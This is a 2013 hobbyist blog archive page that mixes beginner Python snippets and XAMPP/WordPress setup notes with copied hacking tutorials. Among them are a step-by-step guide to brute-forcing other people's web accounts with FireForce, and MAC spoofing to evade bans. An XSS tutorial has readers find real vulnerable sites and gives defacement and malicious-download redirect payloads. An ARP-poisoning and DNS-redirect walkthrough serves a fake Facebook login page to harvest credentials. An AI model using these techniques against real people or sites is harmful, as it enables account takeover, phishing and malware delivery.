Sonic Tricks: August 2013

Thursday, 29 August 2013

PYTHON TUTORIAL 4: IF, ELSE & ELIF STATEMENT

hacking="security"

if hacking=="crime":

print 'wrong'

elif hacking=="security":

print 'yes'

else:print 'no'

PYTHON TUTORIAL 5: len() FUNCTION

my_list = [0,4,5,2,3,4,5]

print len(my_list)

PYTHON TUTORIAL 6: RAW INPUT

site = raw_input("Enter Ur Favourite Website : ")

print site

NEXT

PYTHON TUTORIAL 3: MORE ON STRINGS

var1 = "Hello World!"
var2 = "Python Programming"

print "var1[0]: ", var1[0]
print "var2[1:5]: ", var2[1:5]

Next

PYTHON TUTORIAL 2: STRINGS

age =str(22)
print "I am "+ age

NEXT

PYTHON TUTORIAL 1: USE OF VARIABLES

Hello Friends after a long time I'm posting here.From today I'm resuming the lovely programming language "PYTHON".So just follow the program and If u get any doubt then u can ask me here.

x=raw_input("Enter ur Name :")
print "Hello!" + x;
raw_input("press<enter>")

FREE DOWNLOAD OF PYTHON

Hey Good Morning Friends! After Knowing About The Introduction Of Python Programing Language U All Are Finding For Download Link Of Python, So This Is The Download Link Of Python-

http://www.python.org/download/

NEXT

Bruteforce Accounts 'via' Mozilla Firefox.

Here's what you'll need :

1. Mozilla Firefox browser. Get it from http://www.mozilla.org/en-US/firefox/new/

2. An add on of Mozilla Firefox called FireForce.

3. A good password list of your choice. The list should be in a TXT file.

So lets begin :

1. Install Mozilla Firefox browser in your computer.

2. Download and install the add-on Fireforce from https://addons.mozilla.org/en-us/firefox/addon/fireforce/

3. Go to the log in page of the account you want to hack into.

4. Type in the username or email id that you want to get access to, in the textbox of the log in page.

5. Type in a random password in the password field of the log in page and click on log in.

6. You'll get a page that contains an error message because its the wrong password.

7. Right click on the error page and click on VIEW PAGE SOURCE option.

8. Copy the HTML code that comes and store it in a TXT file.

9. Get back to the initial log in page and type the username or email id in the textbox.

10. Right click on the password field box.

11. From the Fireforce option, click on "Load Dictionary" option.

12. Select the wordlist(password list) TXT file that you have and click on load.

13. After that, a box asking for the error code and number of requests per second will appear.

14. Go to the TXT file in step 8, select the full HTML code and paste it in the error code field.

15. Set the number of request per second(500 preferable). More the number, faster its done, but more the risk.

16. Click on Save and there you go!!!

For wordlist go here: http://www.cyberwarzone.com/cyberwarfare/password-cracking-mega-collection-password-cracking-word-lists

WAIT TILL THE ACCOUNT GETS PENETRATED INTO!!!

Wednesday, 28 August 2013

Step by step How to Change MAC Address on Windows:

1. Open our command prompt (press windows key + R and type cmd).

type ipconfig /all to view our MAC address. On this picture is my MAC address.

2. Now the next step open run (press windows keyboard + R and type ncpa.cpl). When window pop up, right click your connection and choose properties.(see picture)

3. A connection window now will pop up. Click configure button.

mine was using a Local Area Connection, this depend on which connection you use (e.g: wireless connection).

3. Again…

another window will pop up about the adapter properties. Click the advanced tab.

On the property column, choose and click Network Address. In the example picture below, I give the value 00-00-00-00-00-01.

click OK when you finished.

4. To check the changes, open the command prompt and check the new MAC address by typing ipconfig /all.

Conclusion:

1. This MAC change method is useful to do a hit and run. Network admin sometimes banned user from the MAC address, so we just need to change the MAC to bypass the ban

- See more at: http://www.hacking-tutorial.com/tips-and-trick/how-to-change-mac-address-on-windows/#sthash.c9SxzdSs.dpuf

Tuesday, 27 August 2013

How to remove USB Shurtcut Virus from Your PC

STEP-1
Download this file to your computer.(Developed by Nitkesh D Ace)
Download SohanSVR
Step-2
Then Extract it. And do not run it as administrator only simple run.
Step-3
Then refresh your usb drive and delete unwanted things and you are done...
------------------------------------------------------------------------------------
[UPDATE]
1. There are a new virus called wscript.exe affect our PC to create surtcut virus. To prevent this follow these steps:
* 1st open task manager. (By right click on start menu bar or by ctrl+alt+del)
* Then goto details(for windows 8 users), Then end process of wscript.exe
* Then delete unwanted files on ur usb and you are done.
If this will work for you then comment plz... :)
------------------------------------------------------------------------------------------------------------

Monday, 26 August 2013

Create your Own Web Proxy Site in 5 easy Steps

Things You Need :
1. A Premium Web hosting account which includes PHP and curl / Free hosting accounts usually wont provide curl that's why i suggest you to use Premium hosting account or you can also setup a webserver at your home computer and host a proxy site at your Local Pc ,you can easily setup your own webserver by using xampp i have written a tutorial on that you can read the article from Here

2. VPN (optional ) - If you find it difficult to port forward (i use hamachi VPN )

Procedure :

1. First Download Proxy script Pack From Here

2. Now extract all the files from the Proxy script pack and upload them to your premium web hosting account for easy uploading, use an ftp client like (file zilla ), If your using xampp like me, Then just put all the files in htdocs folder as shown

3. Now enter your website name in your web browser and you should see your web proxy site

4. For those using xampp first go to xampp folder, then navigate to php folder , Now open php.ini and search for curl, Now Uncomment the following line by removing the semicolon ";extension=php_curl.dll " as shown

5. Now restart xampp and enter localhost or 127.0.0.1 in your browser , You should now see your proxy site running , If your not getting it then redo all the steps !!

Now those setting up a proxy server at your home PC are Usually behind a router or modem, In order to access your proxy server from anywhere (like from your collages , offices ) you have to port forward your web server, Port forwarding can be a difficult job for beginners as an alternative you can use a VPN .when using a vpn theirs no need of port forwarding. I use Hamachi a free to use vpn to accomplish my goal

First Download and install Hamcahi, You will be provided with an ip address starting with 5.xxx..xxx.xxx
To use your proxy, Simply enter your hamachi ip address in your web browser and you,ll see your proxy site as shown

Hope you like this tutorial for further doubts and clarifications please pass your comments

Read more: http://www.101hacker.com/2011/09/create-your-own-personal-web-proxy-site.html#ixzz2d4jAt3AR

Basic hacking via cross site scripting xss the logic

1. Found a Cross Site Scripting (XSS) vulnerable website, or

2. You can download the simple PHP file I have already create below (download link)

Mediafire.com

Step by Step :

1. You can use the PHP file I already put on mediafire.com for you test it on your own lab(use XAMPP), but for this tutorial I will use from real website on the wild internet (do not worry, the logic was the same, once you understand it you'll got the point)

2. Use Google to search for vulnerable website :

Basic Hacking via Cross Site Scripting (XSS) - The Logic

Pencarian was Indonesian language equal to searching, you can modify the Google parameter for search the much more specific website even in your own language.

3. To find a vulnerable website, you need to do a trial and error. I'm testing more than 5 website to test for their search feature is it vulnerable or not for XSS.

The simple method to test was using <h1> and <script>alert('x');</script> tag like example picture above.

4. If the website was vulnerable, you will find something like this.

Description :

1. I test other website and input the code <h1>TEST</h1> or <script>alert('x');</script> on search box.

2. The result was show a heading title, but I'm not sure, then

3. I check the selection source to make sure it's not a bold :-p

4. Oops..my query was purely processed by server without filtering

5. Now we got the vulnerable website what to do next?? Did you know that with Cross Site Scripting (XSS) you also can do a defacing to a website by injecting some code in it?(not really deface/fake)

Description :

I put this script on search box to display the fake website deface.

<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

6. This Cross Site Scripting (XSS) Vulnerability also you can use to steal a session cookie, I will write the tutorial later

7. Now after we can do deface, show a heading tag, and alerting using javascript what next?

Let say I have a fake exe program that containing a malicious program and I host it on another website and I want some user download it. In this tutorial I will use putty.exe as a malicious program that can be downloaded from http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe. BTW putty was not a malicious program…in this case I only use it for testing purpose to make sure the attack was work.

Description :

On the search box I put the script :
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

so the URL was like this : http://www.vulnerable-website.com/search?keyword=%3Cscript%3Edocument.location=%22http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe%22;%3C/script%3E\

8. It's too long

so maybe some service that can make URL more short will be useful to make the link like this :

http://goo.gl/T5tPh

9. From the step 7 and 8 can you imagine how if the attacker was use the real malicious file to harm user computer? or maybe the attacker combine it with backtrack metasploit like my other tutorial (view here)? only you who can answer it

If you still not clear for the tutorial above, you can view the video below:

Countermeasures/Prevention :

1. For developer : always filter user input and prevent some special characters being processed before filter it first.

2. For user : If you find unusual or strange environment from website you visited, it's better to leave it out.

Hope it's useful

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/basic-hacking-via-cross-site-scripting-xss-the-logic/#sthash.589DCMGT.dpuf

Hacking Facebook Using Man In The Middle Attack

In the picture above, the attacker act as the third person attacker will manipulate the switch routing table so the victim will think that attacker is a Web server and vice versa, because the attacker has changed the routing table.

For this tutorial we need to prepare the tools to do Proof of Concept about this tutorial. Below you can download it.

1. XAMPP – APACHE+PHP+MySQL(We use XAMPP for our fake facebook web server)

2. Cain & Abel (We use it for Man in the Middle Attack)

3. Facebook Offline Page (I have nulled the code, so this script will not contacting Facebook when victim accessed fake Facebook page — only use this for learning)

Download Facebook Offline Page (mediafire.com):

Download

Update : replace your index.php and login.php using following files Download Here.

Step by step Hacking Facebook Using Man in the Middle Attack:

Attacker IP Address : 192.168.160.148

Victim IP Address : 192.168.160.82

Fake Web Server : 192.168.160.148

I assume you’re in a Local Area Network now.

1. Install the XAMPP and run the APACHE and MySQL service

2. Extract the fb.rar and copy the content to C:\xampp\htdocs

3. Check the fake web server by open it in a web browser and type http://localhost/

4. Install Cain & Abel and do the APR(ARP Poisoning Routing), just see the step by step how to below

Click the start/stop sniffer

Choose your interface for sniffing and click OK. When it’s finish, click again the Start/Stop Sniffer to activate the sniffing interface.

Go to the Sniffer tab and then click the + (plus sign)

Select "All hosts in my subnet" and Click OK.

You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)

After we got all of the information, click at the bottom of application the APR tab.

Click the + button, and follow the instruction below.

When you finish, now the next step is preparing to redirect the facebook.com page to the fake web server.

Click "APR DNS" and click + to add the new redirecting rule.

When everything is finish, just click OK. Then the next step is to activate the APR by clicking the Start/Stop APR button.

5. Now Hacking Facebook using MITM has been activated. This is how it looks like when victim opened http://www.facebook.com

6. But if you ping the domain name, you can reveal that it’s fake, because the address is IP of the attacker

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-facebook-using-man-in-the-middle-attack/#sthash.rQEZkDID.dpuf

How to Install Wordpress on XAMPP

Extract the contents of the ZIP file called "wordpress.zip", which was downloaded in step 1, to the htdocs folder within the XAMPP directory.If ZIP file extracted properly there should be a new directory called "wordpress" within the \xampp\htdocs directory.Before the process can move forward, please ensure that the web server environment is running properly.
3
Go to the XAMPP main page by opening a web browser and entering the following URL:

http://localhost/xampp/ .
4
Select the link called "phpMyAdmin" on the lower left side of the menu or by entering the following URL:

http://localhost/xampp/phpmyadmin .
5
At the phpMyAdmin main page, there will be an area in the middle of the screen called "MySQL localhost". From this section a new database will be created for use by the Wordpress installation.
- In the field labeled "Create new database" enter the name "wordpress". From the dropdown labeled "Collation" select "utf8_unicode_ci". Then press the button labeled "Create".
- If the database entry was created successfully the message "Database wordpress has been created" should be displayed.
6
Using the Windows Explore navigate to the xampp\htdocs\wordpress directory. Open the file called "wp-config-sample.php" within the wordpress directory.
7
Once the file has been opened edit the following lines:

/** The name of the database for WordPress */
define('DB_NAME', 'putyourdbnamehere'); ==> change 'putyourdbnameheree' to 'wordpress'

/** MySQL database username */
define('DB_USER', 'usernamehere'); ==> change 'usernamehere' to 'root'

/** MySQL database password */
define('DB_PASSWORD', 'yourpasswordhere'); ==> change 'yourpasswordhere' to ' ' (leave it blank)
8
When the file has been edited as described in the previous step, save a copy of the file as "wp-config.php" in the wordpress directory and close the file.
9
Go to the Wordpress Installation page by opening a web browser and entering the following URL:

http://localhost/wordpress/wp-admin/install.php .
10
Enter a title for the blog in the field labeled "Blog Title". Enter an email address in the field labeled "Your E-mail". Then press the button labeled "Install Wordpress".
11
If the information in the previous step was entered correctly there should be a new screen titled "Success!". This screen presents a username called "admin" and a temporary password. It is a randomly generated password so it is important to make note of it until a new password has been selected. Press the button labeled "Log In".
12
At the Log In screen type the word "Admin" in the field labeled "Username" and type the temporary password, which was created in the previous step, in the field labeled "Password". Press the button labeled "Log In".
13
If the log in was successful then the Wordpress Dashboard appears. There is a notice which states that an auto-generated password is being used and to change it to something easier to remember. The link labeled "Yes. Take me to my profile page" allows the temporary password to be changed. Once the password has been changed editing of the content and themes can begin.